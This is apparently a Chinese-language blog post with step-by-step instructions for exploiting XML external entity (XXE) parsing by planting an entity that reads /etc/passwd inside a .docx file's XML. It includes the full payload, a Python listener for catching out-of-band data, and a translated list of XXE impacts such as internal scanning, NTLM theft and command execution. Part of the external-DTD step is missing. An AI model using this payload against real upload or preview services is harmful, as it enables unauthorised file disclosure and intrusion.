DOCX XXE 详细步骤
看到有漏洞详情,但是没有具体说步骤,我这里整理一下:
1、创建一个.docx文件,并随意写入文件<不写文件是打不开的>
2、用7.zip解压.docx文件,找到.xml文件
3、修改.xml文件,插入XXE代码:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> //插入代码
<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00864BB8" w:rsidRDefault="00630334"><w:r><w:t>test &xxe;</w:t></w:r></w:p><w:sectPr w:rsidR="00864BB8" w:rsidSect="00864BB8"><w:pgSz w:w="11906" w:h="16838"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/><w:cols w:space="708"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>
或者使用如下payload:
在自己的服务器上上传ext.dtd文件,内容为:
4、上传.docx文件,点击预览
或者在自己的服务器上监听80端口:
sudo python -m SimpleHTTPServer 80
XXE威胁:
1- DoS on the parsing system by making it open, e.g.file:///dev/random | file:///dev/urandom | file://c:/con/con
1、通过打开file:///dev/random | file:///dev/urandom | file://c:/con/con等文件造成解析系统DOS
2- TCP scans using HTTP external entities (including behind firewalls since application servers often have world view different from that of the attacker)
2、通过使用http外部输入进行TCP扫描
3- Unauthorised access to data stored as XML files on the parsing system file system (of course the attacker still needs a way to get these data back)
3、非授权访问解析系统上以XML文件存储的数据<攻击者需要采用某种方法是这些数据返回>
4- DoS on other systems (if parsing system is allowed to establish TCP connections to other systems)
4、在其他系统上找出DOS<如果解析系统允许与其他系统建立TCP连接>
5- NTLM authentication material theft by initiating UNC file access to systems under attacker control (far fetched?)
5、通过初始化访问访问受攻击者控制服务器的UNC文件窃取NTLM 认证资料
6- Doomsday scenario: A widely deployed and highly connected application vulnerable to this attack may be used for DDoS.
6、世界末日情景:攻击者可以使用一个广泛部署并且高连接的脆弱应用实现DDOS
7- Directory Listing, Read system and application files and in some cases execute system commands using php expect:// wrapper
- See more at: http://attack-secure.com/hacked-facebook-word-document/#sthash.sggH5LSK.dpuf
7、目录遍历、读系统和应用文件,在某种情况下还可以使用PHP expect执行系统命令
1创建docx---2用WinRAR解压---3修改xml---4保存---5打包为zip---6改名为docx---7上传--8-预览
1-4步骤都知道,5-6可以这么做吗?说好的详细呢。。。因为我一直在测试,发现这个样子不行啊。。